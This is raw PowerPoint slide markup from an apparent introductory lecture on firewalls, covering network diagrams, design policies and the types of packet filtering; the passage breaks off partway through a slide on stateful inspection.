      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="CustomShape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4745160" y="3736800"/>
            <a:ext cx="101160" cy="10908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541" name="CustomShape 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5641920" y="3625920"/>
            <a:ext cx="1901520" cy="1141200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>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solidFill>
            <a:srgbClr val="00FFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Line 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5148000" y="4232160"/>
            <a:ext cx="490680" cy="3240"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="11160">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="CustomShape 331"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4205160" y="5037120"/>
            <a:ext cx="47160" cy="2282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5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544" name="CustomShape 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029120" y="5249880"/>
            <a:ext cx="47160" cy="2282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5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545" name="CustomShape 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5864400" y="4979880"/>
            <a:ext cx="1449000" cy="539280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="CustomShape 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907320" y="5037120"/>
            <a:ext cx="47160" cy="2282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5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547" name="CustomShape 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6915240" y="5249880"/>
            <a:ext cx="47160" cy="228240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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548" name="CustomShape 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4160880" y="5211720"/>
            <a:ext cx="609120" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="384" h="59">
                <a:moveTo>
                  <a:pt x="4" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="335" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="26"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="384" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="1440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="CustomShape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2562120" y="5211720"/>
            <a:ext cx="609120" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="384" h="59">
                <a:moveTo>
                  <a:pt x="381" y="33"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="49" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="33"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59" y="59"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="59"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="1440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="CustomShape 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873840" y="5211720"/>
            <a:ext cx="609120" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="384" h="59">
                <a:moveTo>
                  <a:pt x="4" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="335" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="26"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="384" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="1440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="CustomShape 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5210280" y="5211720"/>
            <a:ext cx="831600" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="671" h="59">
                <a:moveTo>
                  <a:pt x="668" y="33"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="49" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668" y="33"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58" y="59"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="59"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="1440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="CustomShape 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2779560" y="4960800"/>
            <a:ext cx="168228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Comic Sans MS"/>
              </a:rPr>
              <a:t>administered</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Comic Sans MS"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="CustomShape 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5918400" y="4925880"/>
            <a:ext cx="1119960" cy="6390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uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>external
network</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
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ttacks and Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10381843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What is being protected by firewalls?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Your data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Your resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Your reputation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90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Firewalls Types of Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55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They can block unwanted traffic.</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They can direct incoming traffic to more trustworthy internal systems.</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They can log traffic to and from the private network.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Firewall Design Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Permit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> any service unless it is expressly denied</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Deny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> any service unless it is expressly permitted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90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Firewall Types	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561"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Personal firewalls</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Static packet filtering</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Dynamic packet filtering</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Proxy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Personal Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563"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Available for personal computers</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Offer protection for individual systems</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Examples</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Zone alarm (Windows)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Black Ice (Windows)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ipchains (Linux)</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iptables (Linux)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:u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Static Packet Filtering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565"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Controls traffic by using information stored within packet headers</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As packets are received by the filtering device, the attributes of the data stored within the packet are compared against the access control list and the traffic is either allowed or denied</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Information used</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Source and Destination IP address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Source and Destination port number</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:u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Static Packet Filtering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56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Not intelligent filtering device</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Offer little protection against advanced types of attacks</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Many routers have the ability to perform static packet filtering (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cisco Routers use Access-Control lists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Aria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Dynamic Packet Filtering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Stateful Inspection</a:t>
            </a:r>
          </a:p>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Maintain a connection table (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
